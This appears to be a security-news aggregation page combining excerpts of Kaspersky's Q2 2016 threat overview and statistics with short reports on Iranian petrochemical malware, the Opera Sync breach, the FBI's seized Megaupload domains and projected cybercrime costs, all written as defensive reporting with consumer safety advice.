We’ve seen an increase in spam e-mails. The spammers try to cash in on people’s desire to watch the games live, sending out messages informing the recipient that they have won a (fake) lottery (supposedly organized by the International Olympic Committee and the Brazilian government): all they need to do to claim their tickets is to reply to the e-mail and provide some personal details.

IT threat evolution in Q2 2016. Overview

Some messages point to fake websites, like this one offering direct sale of tickets without the need to make an application to the official lottery:

IT threat evolution in Q2 2016. Overview

These fake ticketing sites are very convincing. Some fraudsters go the extra mile by obtaining legitimate SSL certificates to provide a secure connection between the victim’s browser and the site – displaying ‘https’ in the browser address bar to lure victims into a false sense of security. The scammers inform their victims that they will receive their tickets two or three weeks before the event, so the victim doesn’t become suspicious until it’s too late and their card details have been used by the cybercriminals. Kaspersky Lab is constantly detecting and blocking new malicious domains, many of which include ‘rio’ or ‘rio2016’ in the title.

It’s too late to buy tickets through official channels, so the best way to see the games is to watch on TV or online. We advise everyone to beware of malicious streaming websites – probably the last-ditch attempt by cybercriminals to scam people out of their money.

Cybercriminals also take advantage of our desire to stay connected wherever we go – to share our pictures, to update our social network accounts, to find out the latest news or to locate the best places to eat, shop or stay. Unfortunately, mobile roaming charges can be very high, so often people look for the nearest Wi-Fi access point. This is dangerous, because data sent and received over an open Wi-Fi network can be intercepted. So passwords, PINs and other sensitive data can be stolen easily. On top of this, cybercriminals also install fake access points, configured to direct all traffic through a host that can be used to control it – even functioning as a ‘man-in-the-middle’ device that is able to intercept and read encrypted traffic.

To gauge the extent of the problem, we drove by three major Rio 2016 locations and passively monitored the available Wi-Fi networks that visitors are most likely to try and use during their stay – the Brazilian Olympic Committee building, the Olympic Park and the Maracana, Maracanazinho and Engenhao stadiums. We were able to find around 4,500 unique access points. Most are suitable for multimedia streaming. But around a quarter of them are configured with weak encryption protocols: this means that attackers can use them to sniff the data of unsuspecting visitors that connect to them.

IT threat evolution in Q2 2016. Overview

To reduce your exposure, we would recommend any traveller (not just those who plan to visit Rio!) to use a VPN connection, so that data from your device travels to the Internet through an encrypted data channel. Be careful though. Some VPNs are vulnerable to DNS leak attacks – meaning that, although your immediate sensitive data is sent via the VPN, your DNS requests are sent in plain text to the DNS servers set by the access point hardware. This would allow an attacker to see what you’re browsing and, if they have access to the compromised Wi-Fi network, define malicious DNS servers – i.e. letting them redirect you from a legitimate site (your bank, for example) to a malicious site. If your VPN provider doesn’t support its own DNS servers, consider an alternative provider or a DNSCrypt service.

There’s one other thing that we need if we want to stay connected – electricity: we need to keep our mobile devices charged. Today you can find charging-points in shopping centres, airports and even taxis. Typically they provide connectors for leading phone models, as well as a USB connector that a visitor can use with their own cable. Some also provide a traditional power supply that can be used with a phone charger.

IT threat evolution in Q2 2016. Overview

IT threat evolution in Q2 2016. Overview

But remember that you don’t know what’s connected to the other end of the USB connector. If an attacker compromises the charging-point, they can execute commands that allow them to obtain information about your device, including the model, IMEI number, phone number and more: information they can use to run a device-specific attack that would then enable them to infect the device. You can find more information about the data that’s transmitted when you connect a device using USB and how an attacker could use it to compromise a mobile device.

This doesn’t mean that you shouldn’t charge your device when you’re away from home. But you should take steps to protect yourself. It’s always best to use your own charger, rather than using charging cables at a public charging-point or buying one from an unknown source. You should also use a power outlet, instead of a USB socket.

Cybercriminals also continue to exploit established ways to make money. This includes using ATM skimmers to steal credit card data. The most basic skimmers install a card reader and a camera to record the victim’s PIN. The best way to protect yourself from this is to cover the keypad as you enter your PIN. However, sometimes cybercriminals replace the whole ATM, including the keypad and screen, in which case the typed password is stored on the fake ATM system. So it’s also important to check the ATM before you insert your card. Check to see if the green light on the card reader is on: typically, they replace the card reader with a version where there is no light, or it’s switched off. Also check the machine to see if there is anything suspicious, such as missing or broken parts.

Card cloning is another problem facing visitors to Rio 2016. While chip-and-PIN makes life harder for cybercriminals, it’s possible for them to exploit flaws in the EMV transaction implementation. It’s difficult to protect yourself against this type of attack, because usually the point-of-sale is modified in order to save the data – to be collected later by the cybercriminals. Sometimes they don’t need physical access to extract the stolen data, as they collect it via Bluetooth. However, there are some steps you can take to reduce your exposure to this type of attack. Sign up for SMS notifications of card transactions from your bank, if they provide this service. Never give your card to the retailer: if they can’t bring the machine to you, go to the machine. If the device looks suspicious, use a different payment method. Before typing your PIN, make sure you’re on the card payment screen and ensure that your PIN isn’t going to be displayed on the screen.

Ransomware: backup or pay up?

Towards the end of last year, we predicted that ransomware would gain ground on banking Trojans – for the attackers, ransomware is easily monetized and involves a low cost per victim. So it’s no surprise that ransomware attacks are increasing. Kaspersky Lab products blocked 2,315,931 ransomware attacks between April 2015 and April 2016 – that’s an increase of 17.7 per cent on the previous year. The number of cryptors (as distinct from blockers) increased from 131,111 in 2014-15 to 718,536 in 2015-16. Last year, 31.6 per cent of all ransomware attacks were cryptors. You can find further information, including an overview of the development of ransomware, in our KSN Report: PC ransomware in 2014-16.

Most ransomware attacks are directed at consumers – 6.8 per cent of attacks in 2014-15 and 13.13 percent in 2015-16 targeted the corporate sector.

However, the figures are different for cryptors: throughout the 24 months covered by the report, around 20 per cent of cryptor attacks targeted the corporate sector.

Hardly a month goes by without reports of ransomware attacks in the media – including recent reports of a hospital and online casino falling victim to ransomware attacks. Yet while public awareness of the problem is growing, it’s clear that consumers and organizations alike are not doing enough to combat the threat; and cybercriminals are capitalizing on this – this is clearly reflected in the number of attacks we’re seeing.

It’s important to reduce your exposure to ransomware (and we’ve outlined important steps you can take here and here). However, there’s no such thing as 100 per cent security, so it’s also important to mitigate the risk. In particular, it’s vital to ensure that you have a backup, to avoid facing a situation where the only choices are to pay the cybercriminals or lose your data. It’s never advisable to pay the ransom. Not only does this validate the cybercriminals’ business model, but there’s no guarantee that they will decrypt your data once you’ve paid them – as one organization discovered recently to its cost. If you do find yourself in a situation where your files are encrypted and you don’t have a backup, ask if your anti-malware vendor is able to help. Kaspersky Lab, for example, is able to help recover data encrypted by some ransomware.

Mobile malware

Displaying adverts remains one of the main methods of monetization for detected mobile objects. Trojan.AndroidOS.Iop.c became the most popular mobile Trojan in Q2 2016, accounting for more than 10% of all detected mobile malware encountered by our users during the reporting period. It displays adverts and installs, usually secretly, various programs using superuser privileges. Such activity quickly renders the infected device virtually unusable due to the amount of adverts and new applications on it. Because this Trojan can gain superuser privileges, it is very difficult to delete the programs that it installs.

In our report IT threat evolution in Q1 2016 we wrote about the Trojan-Banker.AndroidOS.Asacub family of banking malware. Representatives of this family have an unusual technique for bypassing the security mechanisms used by operating systems – they overlay the regular system window requesting device administrator privileges with their own window containing buttons. The Trojan thereby conceals the fact that it is gaining elevated privileges in the system, and tricks the user into approving these privileges. In Q2 2016, Asacub introduced yet another method for deceiving users: the Trojan acquired SMS messenger functionality and started offering its services in place of the device’s standard SMS app.

IT threat evolution in Q2 2016. Overview

Dialog window of Trojan-Banker.AndroidOS.Asacub.i asking for the rights to be the main SMS application

This allows the Trojan to bypass system constraints first introduced in Android 4.4 as well as delete or hide incoming SMSs from the user.

Back in October 2015, we wrote about representatives of the Trojan-PSW.AndroidOS.MyVk family that steal passwords from user accounts on the VK.com social network. This quarter, those responsible for distributing Trojans from this family introduced a new approach for bypassing Google Play security mechanisms that involved first publishing an app containing useful functionality with no malicious code. Then, at least once, they updated it with a new version of the application – still without any malicious code. It was more than a month after the initial publication that the attackers eventually added malicious code to an update. As a result, thousands of users downloaded Trojan-PSW.AndroidOS.MyVk.i.

Data breaches

Personal information is a valuable commodity, so it’s no surprise that cybercriminals target online providers, looking for ways to bulk-steal data in a single attack. We’ve become accustomed to the steady stream of security breaches reported in the media. This quarter has been no exception, with reported attacks on beautifulpeople.com, the nulled.io hacker forum (underlining the fact that it’s not just legitimate systems that are targeted), kiddicare, Tumblr and others.

Some of these attacks resulted in the theft of huge amounts of data, highlighting the fact that many companies are failing to take adequate steps to defend themselves. It’s not simply a matter of defending the corporate perimeter. There’s no such thing as 100 per cent security, so it’s not possible to guarantee that systems can’t be breached. But any organization that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. As an alternative, people can use a password manager application to handle all this for them automatically. Unfortunately, all too often people use easy-to-guess passwords and re-use the same password for multiple online accounts – so that if the password for one is compromised, all the victim’s online IDs are vulnerable. This issue was highlighted publicly in May 2016 when a hacker known as ‘Peace’ attempted to sell 117 million LinkedIn e-mails and passwords that had been stolen some years earlier. More than one million of the stolen passwords were ‘123456’!

Many online providers offer two-factor authentication – i.e. requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings. Two-factor authentication certainly enhances security – if people choose to take advantage of it.

Several companies are hoping to replace passwords altogether. Apple allows fingerprint authorization for iTunes purchases and payments using Apple Pay. Samsung has said it will introduce fingerprint, voice and iris recognition for Samsung Pay. Amazon has announced ‘selfie-pay’. MasterCard and HSBC have announced the introduction of facial and voice recognition to authorize transactions. The chief benefit, of course, is that it replaces something that customers have to remember (a password) with something they have – with no opportunity to short-circuit the process (as they do when they choose a weak password).

Biometrics are seen by many as the way forward. However, they are not a security panacea. Biometrics can be spoofed, as we’ve discussed before (here, here and here); and biometric data can be stolen. In the end, multi-factor authentication is essential – combining something you know, something you have and something you are.

A malware was found in Iran petrochemical complexes, but it’s not linked to recent incidents

29.8.2016 Virus

The head of Iran’s civilian defense confirmed that a malware was found in petrochemical complexes, but it hasn’t caused the fires under investigation.
Last week, I reported the news related to a series of fires at Iranian petrochemical plants. The Iran’s Supreme National Cyberspace Council started an investigation to discover if the incidents at oil and petrochemical fires were caused by cyber attacks. Authorities fear that nation state actors may have launched an attack similar to Stuxnet one.

Mr. Abolhassan Firouzabadi, the secretary of Iran’s Supreme National Cyberspace Council, announced that a team of cyber experts will be involved in the investigation to understand if the incidents are linked and if they were caused by cyber attacks.

fires petrochemical complexes Iran
Source The Tehrantimes.com

“Abolhassan Firouzabadi, secretary of Iran’s Supreme National Cyberspace Council, says a team of experts will look at the possibility of cyberattacks as being a cause, Press TV reported on Sunday.

Special teams will be sent to the afflicted sites to study the possibility of cyber systems having a role in the recent fires, he said.” reported the Tehran Times.

Iranian cyber experts have spotted and removed two malware that infected systems at two petrochemical plants. The news was confirmed by a senior military official and reported by Venturebeat.com.

“Iran has detected and removed malicious software from two of its petrochemical complexes, a senior military official said on Saturday, after announcing last week it was investigating whether recent petrochemical fires were caused by cyber attacks.” reported by Venturebeat.com.

The official also added that the malware was not responsible for the incidents occurred at the petrochemical complexes, the experts discovered that it was inactive and not linked to the fires.

“In periodical inspection of petrochemical units, a type of industrial malware was detected and the necessary defensive measures were taken,” Gholamreza Jalali, head of Iran’s civilian defense, said the state news agency IRNA.

“the discovery of this industrial virus is not related to recent fires.”

As declared by the oil minister, the string of fires in petrochemical complexes was caused by the lack of proper safety measures caused by the cut of the budgets operated by the firms in the energy sector.

Opera Browser Sync Service Hacked; Users' Data and Saved Passwords Compromised
28.8.2016 thehackernews Hacking
Opera has reset passwords of all users for one of its services after hackers were able to gain access to one of its Cloud servers this week.
Opera Software reported a security breach last night, which affects all users of the sync feature of its web browser.
So, if you’ve been using Opera’s Cloud Sync service, which allows users to synchronize their browser data and settings across multiple platforms, you may have hacked your passwords, login names, and other sensitive data.
Opera confirmed its server breach on Friday, saying the "attack was quickly blocked" but that it "believe some data, including some of [their] sync users’ passwords and account information, such as login names, may have been compromised."
Opera has around 350 Million users across its range products, but around 1.7 Million users using its Sync service had both their synchronized passwords as well as their authentication passwords leaked in the hack.
Since the company has already reset passwords of all of its registered Opera Sync users and emailed them with details, you need not worry about your account.
"Although we only store encrypted (for synchronized passwords) or hashed and salted (for authentication) passwords in this system, we have reset all the Opera sync account passwords as a precaution," Opera Software explained in a blog post.
Additionally, the company has also informed all Opera Sync users about the security breach and recommended them to change passwords for their Opera Sync accounts as soon as possible. You can obtain a new password for Opera sync using the password resetting page.
The complete details about the intrusion and extent of the breach are yet unknown.
Opera Software encouraged users to reset passwords for any third party websites they may have synced with its service.
However, if you are the one using the same password for multiple sites, you are also advised to change your passwords for those sites manually.
Since we’ve repeatedly seen folks reusing passwords across multiple services with recent high-profile account hacking, you are advised to use a good password manager always to keep a strong, unique password for your online accounts.
We have listed some best password managers that would help you understand the importance of password managers and choose a suitable one according to your requirement.

Megaupload Domains Seized by FBI 'Hijacked' to Host Porn Ads
28.8.2016 thehackernews Hacking
Well, we all know that the FBI has previously hosting porn on the Internet. I still remember the case of PlayPen, the world's largest dark web child pornography site, which was seized by FBI and ran from agency’s own servers to uncover the site's visitors.
Now, one of the most popular sites owned and operated by the FBI has been serving porn as well.
FBI-owned Megaupload.org and several other domains were allegedly serving up ads for "casual sex," "adult cam chat," "adult affair dating," and "live sex cams" and other 18+ entertainment.
Megaupload was once a famous and highly popular site for pirate and copyright contents that agency seized from Kim Dotcom almost five years ago.
Since a criminal case against Dotcom is still pending in the United States, the FBI also retained control over several of the company’s assets, including cash, cars, and over a dozen of Megaupload’s former domain names, including Megastuff.co, Megaworld.mobi, Megaclicks.org, Megaupload.com, and Megavideo.com.
Initially, these Megaupload domains served a banner indicating the federal agents had seized them as part of a criminal investigation, those users who visited the site yesterday were surprised to see soft porn ads, offering links to adult entertainment.
But, How did this Happen?
'Lost control'
Yes, the hijacking of the Megaupload domains was not the result of some sophisticated hack that allowed hackers to serve you soft porn and sex ads, rather the FBI had "lost control" of the domains in the same way it lost control last year.
TorrentFreak suggests the FBI forgot to renew an expired domain, CIRFU.NET, which the feds used for their "name server" to redirect traffic from sites it had seized, and that someone else just purchase it and linked it to the Megaupload domains.
The Federal Bureau of Investigation fell into the same trap last year when the web addresses it seized led people onto to sites peddling porn, fake security software, malware, adware and bogus special offers.
Though the federal authorities reportedly removed the nameservers altogether to fix the issue, the exact identity of who got control of Megaupload.org and its associated sites is not known. However, it is clear that the feds have not learned from their past mistakes.
The FBI has yet to comment on what happened to the domains.

Global cost of cybercrime will grow from $3 trillion in 2015 to $6 trillion annually by 2021
28.8.2016 securityaffairs Crime
The cost of cybercrime could reach $6 trillion by 2021 (global annual cybercrime costs has been estimated $3 trillion in 2015).
The global cost of cybercrime continues to increase, this isn’t a surprise due to the intensification of this kind of illegal practice. According to an analysis conducted by Cybersecurity Ventures, the cost of cybercrime could reach $6 trillion by 2021 (global annual cybercrime costs has been estimated $3 trillion in 2015).

Security experts are questioning about the effective grow of the cost of cybercrime in the next five years, trillion dollars plus is a worrying trend, but anyway possible as explained by Larry Ponemon, founder of the Ponemon Institute.

“a trillion dollars plus is a real possibility,” commented Larry Ponemon. “If you asked me five or six years ago, I’d fall over,”

The growth of the cybercrime activities will force an increase in the global spending on cyber security products and services. Global spending is expected to exceed $1 trillion cumulatively over the next five years, from 2017 to 2021.

Criminal activities will evolve from targeting computers and mobile devices to IoT, transportations, and power grids.

global cost of cybercrime 2

The cybercrime cost evaluated by the researchers takes into account all possible damages associated with cybercrime activities including:

damage and destruction of data, stolen money.
theft of intellectual property.
theft of personal and financial data, embezzlement.
lost productivity.
reputational harm.
post-attack disruption to the normal course of business, forensic investigation.
restoration and deletion of hacked data and systems.
We have also to consider that a significant portion of the overall cost of cybercrime is not calculated due to unreported crimes.

The report highlights the lack of an effective law enforcement agency for financial cybercrime today. Despite the recent successes of law enforcement against criminal organizations worldwide, it is necessary a supplementary effort against the growing threats.

The U.S. has declared a national emergency to deal with the cyber threats, more exposed to them are small businesses.

“The world’s cyber attack surface will grow an order of magnitude larger between now and 2021.” states the report.

IT threat evolution in Q2 2016. Statistics
28.8.2016 Kaspersky Security

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Q2 figures

According to KSN data, Kaspersky Lab solutions detected and repelled 171,895,830 malicious attacks from online resources located in 191 countries all over the world.
54,539,948 unique URLs were recognized as malicious by web antivirus components.
Kaspersky Lab’s web antivirus detected 16,119,489 unique malicious objects: scripts, exploits, executable files, etc.
Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 1,132,031 user computers.
Crypto ransomware attacks were blocked on 311,590 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 249,619,379 unique malicious and potentially unwanted objects.
Kaspersky Lab mobile security products detected:
3,626,458 malicious installation packages;
27,403 mobile banker Trojans (installation packages);
83,048 mobile ransomware Trojans (installation packages).
Mobile threats

In Q2 2016, Kaspersky Lab detected 3,626,458 malicious installation packages – 1.7 times more than in the previous quarter.

IT threat evolution in Q2 2016. Statistics

Number of detected malicious installation packages (Q3 2015 – Q2 2016)

Distribution of mobile malware by type

As of this quarter, we will calculate the distribution of mobile malware by type based on the number of detected malicious installation packages rather than modifications, as was the case in earlier reports.

IT threat evolution in Q2 2016. Statistics

Distribution of new mobile malware by type (Q1 2016 and Q2 2016)

In Q2 2016, RiskTool software, or legal applications that are potentially dangerous to users, topped the ranking of detected malicious objects for mobile devices. Their share increased from 31.6% in Q1 to 45.1% this quarter.

Adware occupies second place. The share of these programs fell 1.4 p.p. compared to the previous quarter, and accounted for 14.2%.

The share of SMS Trojans fell from 18.5% to 10.8%, pushing this category of malicious programs down from second to third place in the ranking. Trojan-SMS.AndroidOS.Agent.qu and Trojan-SMS.AndroidOS.Agent.f accounted for most of the detected SMS Trojans, with both accounting for approximately 30% of all malicious files in this category.

The Trojan-Dropper share also fell – from 14.5% in Q1 to 9.2%. Trojan-Dropper.AndroidOS.Agent.v led the way: we detected more than 50,000 installation packages related to this Trojan.

TOP 20 mobile malware programs

Please note that this ranking of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Name % of attacked users*
1 DangerousObject.Multi.Generic 80.87
2 Trojan.AndroidOS.Iop.c 11.38
3 Trojan.AndroidOS.Agent.gm 7.71
4 Trojan-Ransom.AndroidOS.Fusob.h 6.59
5 Backdoor.AndroidOS.Ztorg.a 5.79
6 Backdoor.AndroidOS.Ztorg.c 4.84
7 Trojan-Ransom.AndroidOS.Fusob.pac 4.41
8 Trojan.AndroidOS.Iop.t 4.37
9 Trojan-Dropper.AndroidOS.Gorpo.b 4.3
10 Trojan.AndroidOS.Ztorg.a 4.30
11 Trojan.AndroidOS.Ztorg.i 4.25
12 Trojan.AndroidOS.Iop.ag 4.00
13 Trojan-Dropper.AndroidOS.Triada.d 3.10
14 Trojan-Dropper.AndroidOS.Rootnik.f 3.07
15 Trojan.AndroidOS.Hiddad.v 3.03
16 Trojan-Dropper.AndroidOS.Rootnik.h 2.94
17 Trojan.AndroidOS.Iop.o 2.91
18 Trojan.AndroidOS.Rootnik.ab 2.91
19 Trojan.AndroidOS.Triada.e 2.85
20 Trojan-SMS.AndroidOS.Podec.a 2.83
* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place is occupied by DangerousObject.Multi.Generic (80.87%), the classification used for malicious programs detected by cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

As in the previous quarter, 16 Trojans that use advertising as their main means of monetization (highlighted in blue in the table) made it into the TOP 20. Their goal is to deliver as many adverts as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which it will be very difficult to delete them.

Trojan.AndroidOS.Iop.c (11.38%) moved from third to second in the TOP 20 and became the single most popular malicious program of the quarter. Over the reporting period we detected this Trojan in 180 countries, but the majority of attacked users were in Russia, India and Algeria. Iop.c can exploit a variety of vulnerabilities in the system to gain superuser privileges. The main method of monetization is displaying advertising and installing (usually secretly) various programs on the user’s device, including other malicious programs.

Q2’16, @kaspersky repelled 172M malicious attacks via online resources located in 191 countries #KLreport #Infosec
Representatives of the Trojan-Ransom.AndroidOS.Fusob ransomware family claimed fourth and seventh places. These Trojans demand a ransom of $100-200 from victims to unblock their devices. Attacks using this Trojan were registered in over 120 countries worldwide in Q2, with a substantial number of victims located in Germany and the US.

Trojan-SMS.AndroidOS.Podec.a (2.83%) has now spent over a year in the mobile malware TOP 20, although it is starting to lose ground. It used to be an ever-present in the TOP 5 mobile threats, but for the second quarter in a row it has only made it into the bottom half of the ranking. Its functionality has remained practically unchanged; its main means of monetization is to subscribe users to paid services.

The geography of mobile threats

IT threat evolution in Q2 2016. Statistics

The geography of attempted mobile malware infections in Q2 2016 (percentage of all users attacked)

TOP 10 counties attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked **
1 China 36.31
2 Bangladesh 32.66
3 Nepal 30.61
4 Uzbekistan 22.43
5 Algeria 22.16
6 Nigeria 21.84
7 India 21.64
8 Indonesia 21.35
9 Pakistan 19.49
10 Iran 19.19
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

China topped the ranking, with more than 36% of users there encountering a mobile threat at least once during the quarter. China also came first in this ranking in Q1 2016.

In all the countries of this ranking, except China, the most popular mobile malware was the same – advertising Trojans that appeared in the TOP 20 mobile malware, and AdWare. The most popular malicious program was Trojan.AndroidOS.Iop.c. In China, a significant proportion of attacks also involved advertising Trojans, but the majority of users there encountered the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families, while Trojan.AndroidOS.Iop.c only occupied sixteenth place.

Russia (10.4%) was 26th in this ranking, Germany (8.5%) 38th, Italy (6.2%) 49th, and France (5.9%) 52th. The US (5.0%) came 59th and the UK (4.6%) 64th.

The safest countries were Austria (3.6%), Sweden (2.9%) and Japan (1.7%).

Mobile banking Trojans

As of this quarter, we will calculate the distribution of mobile malware by type based on the number of detected malicious installation packages rather than modifications, as was the case in earlier reports. Over the reporting period, we detected 27,403 mobile Trojans, which is 1.2 times less than in Q1.

IT threat evolution in Q2 2016. Statistics

Number of mobile banking Trojans detected by Kaspersky Lab solutions (Q3 2015 – Q2 2016)

The TOP 5 most popular mobile banking Trojans in Q2 consisted of representatives from just two families – Trojan-Banker.AndroidOS.Asacub and Trojan-Banker.AndroidOS.Svpeng.

Trojan-Banker.AndroidOS.Asacub.i was the most popular mobile banking Trojan of the quarter. It uses different methods to trick users and bypass system constraints. In Q1 we identified a modification of this mobile Trojan that overlaid the regular system window requesting device administrator privileges with its own window containing buttons. The Trojan thereby conceals the fact that it is gaining elevated privileges in the system from the user, and tricks the user into approving these privileges. In Q2, we detected a modification that requested the user’s permission to become the main SMS application.

IT threat evolution in Q2 2016. Statistics

Dialog window of Trojan-Banker.AndroidOS.Asacub.i asking for the user’s approval to become the main SMS application

This allows the Trojan to bypass the system constraints introduced in Android 4.4, and to hide incoming SMSs from the user (as a rule, it hides messages from banks and payment systems). In order to make users save this malicious program in the settings as the main SMS application, the Trojan authors had to, among other things, implement a messenger interface.

IT threat evolution in Q2 2016. Statistics

The Trojan-Banker.AndroidOS.Asacub.i interface used to create and send messages

Asacub is actively distributed via SMS spam.

Russia and Germany lead in terms of the number of users attacked by mobile banking Trojans:

IT threat evolution in Q2 2016. Statistics

Geography of mobile banking threats in Q2 2016 (percentage of all users attacked)

The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we created a country ranking according to the percentage of users attacked by mobile banker Trojans.

TOP 10 counties attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked**
1 Russia 1.51
2 Australia 0.73
3 Uzbekistan 0.45
4 Korea 0.35
5 China 0.34
6 Ukraine 0.33
7 Denmark 0.28
8 Germany 0.24
9 Turkey 0.23
10 Kyrgyzstan 0.17
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q2 2016, first place was occupied by Russia (1.51%) where the majority of affected users encountered the Trojan-Banker.AndroidOS.Asacub, Trojan-Banker.AndroidOS.Svpeng and Trojan-Banker.AndroidOS.Faketoken families of mobile banker Trojans.

China, last quarter’s leader, fell to fifth place this quarter.

In second place again was Australia where the Trojan-Banker.AndroidOS.Acecard family was replaced by the Trojan-Banker.AndroidOS.Marcher family as the most popular threat.

Banking Trojans were especially popular with attackers in Russia and Australia. The percentage of users attacked by this malware in the two countries relative to all attacked users accounted for 14%.

Mobile Trojan-Ransomware

As of this quarter, we will calculate the distribution of mobile malware by type based on the number of detected malicious installation packages rather than modifications, as was the case in earlier reports.

In Q2 2016, we detected 83,048 mobile Trojan-Ransomware installation packages, which is about the same number as the previous quarter and seven times more than in Q4 2015.

IT threat evolution in Q2 2016. Statistics

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab
(Q3 2015 – Q2 2016)

The sharp rise in the number of mobile Trojan-Ransomware installation packages in 2016 was caused by the active proliferation of the Trojan-Ransom.AndroidOS.Fusob family of Trojans. In the first quarter of 2016, this family accounted for 96% of users attacked by mobile ransomware. In Q2 its share was 85%.

In Q2 2016, 54.5M unique malicious URLs were recognized by @kaspersky web antivirus components #KLreport #IT
Trojan-Ransom.AndroidOS.Fusob.h became the most popular mobile Trojan-Ransomware in the second quarter – it accounted for nearly 60% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including the GPS coordinates and call history, and downloads the data to a malicious server. After that, it may get a command to block the device. In the second quarter we registered a growth in the number of installation packages related to Trojan-Ransom.AndroidOS.Congur.b: their share grew from 0.8% to 8.8%. This Trojan, targeting Chinese-speaking users, changes the system password (PIN), or installs it if no password was installed earlier, thus making it impossible to use the device. The notification containing the ransom demand is displayed on the screen of the blocked device.

Germany, the US and Russia had the highest number of users attacked by Trojan-Ransomware this quarter:

IT threat evolution in Q2 2016. Statistics

Geography of mobile Trojan-Ransomware in Q2 2016 (percentage of all users attacked)

To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we created a country ranking according to the percentage of users attacked by mobile Trojan-Ransomware.

TOP 10 counties attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Country* % of users attacked**
1 Canada 2.01
2 Germany 1.89
3 US 1.66
4 Switzerland 1.63
5 Mexico 1.55
6 UK 1.51
7 Denmark 1.35
8 Italy 1.35
9 Kazakhstan 1,35
10 Netherlands 1.15
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

In all the countries of the TOP 10, except for Kazakhstan, the most popular Trojan-Ransom family was Fusob. In the US, the Trojan-Ransom.AndroidOS.Svpeng family was also popular. These Trojans demand a ransom of $100-500 from victims to unblock their devices.

In Kazakhstan and Uzbekistan, the main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demanding $10 to unblock it.

Vulnerable applications exploited by cybercriminals

In Q2 2016, exploits for Adobe Flash Player remained popular. During the reporting period two new vulnerabilities were discovered in this software:

An exploit for CVE-2016-4117 was added to the Magnitude and Neutrino exploit kits. The CVE-2016-4171 vulnerability was used by the ScarCruft group to carry out targeted attacks. We wrote a more detailed account of this group’s activities in a blog published in mid-June.

In Q2 2016, @kaspersky web #antivirus detected 16,119,489 unique malicious objects #KLreport #netsec
The main event this quarter was the demise of the long-term market leaders – the Angler and Nuclear exploit kits. Angler’s departure resulted in market players shifting to other kits to distribute malware. In particular, we registered a dramatic growth in the popularity of the Neutrino exploit kit.

This is how the overall picture for the use of exploits in the second quarter looks:


Distribution of exploits used in attacks by the type of application attacked, Q2 2016

The chart shows that despite the exit of the market leaders the breakdown of exploits was almost unchanged from the previous quarter: the proportion of exploits for Microsoft Office (14%) and Java (7%) fell by 1 p.p., while the share for Android grew 2 p.p. and reached 24%. This suggests that demand for exploit kits has been spread among the remaining players: RIG, Magnitude and Neutrino. The latter was the undisputed leader this quarter in terms of the number of attempts to download malware.

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

In the second quarter of 2016, Kaspersky Lab’s web antivirus detected 16,119,489 unique malicious objects: scripts, exploits, executable files, etc. 54,539,948 unique URLs were recognized as malicious by web antivirus components.

Online threats in the banking sector

These statistics are based on the detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

Number of users attacked by malware targeting finances<

Due to the constant emergence of new representatives of banking Trojans and functional changes in existing banking Trojans, in the second quarter of 2016 we have significantly updated the list of verdicts classed as banking risks. This means the number of financial malware victims has changed significantly compared to the data published in previous quarters. As a comparison, we have recalculated the statistics for the previous quarter, taking into account all the malware from the updated list.

Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 1,132,031 computers in Q2 2016. The quarter saw an increase in financial malware activity: the figure for Q2 is 15.6% higher than that for the previous quarter (979, 607).

IT threat evolution in Q2 2016. Statistics

Number of users attacked by malware targeting finances, Q2 2016

Geography of attack

To evaluate and compare the risk of being infected by banking Trojans worldwide, we calculate the percentage of Kaspersky Lab product users who encountered this type of threat during the reporting period in the country, relative to all users of our products in the county.

IT threat evolution in Q2 2016. Statistics

Geography of banking malware attacks in Q2 2016 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of attacked users**
1 Turkey 3.45
2 Russia 2.92
3 Brazil 2.63
4 Pakistan 2.60
5 Venezuela 1.66
6 Tunisia 1.62
7 Japan 1.61
8 Singapore 1.58
9 Libya 1.57
10 Argentina 1.48
These statistics are based on the detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
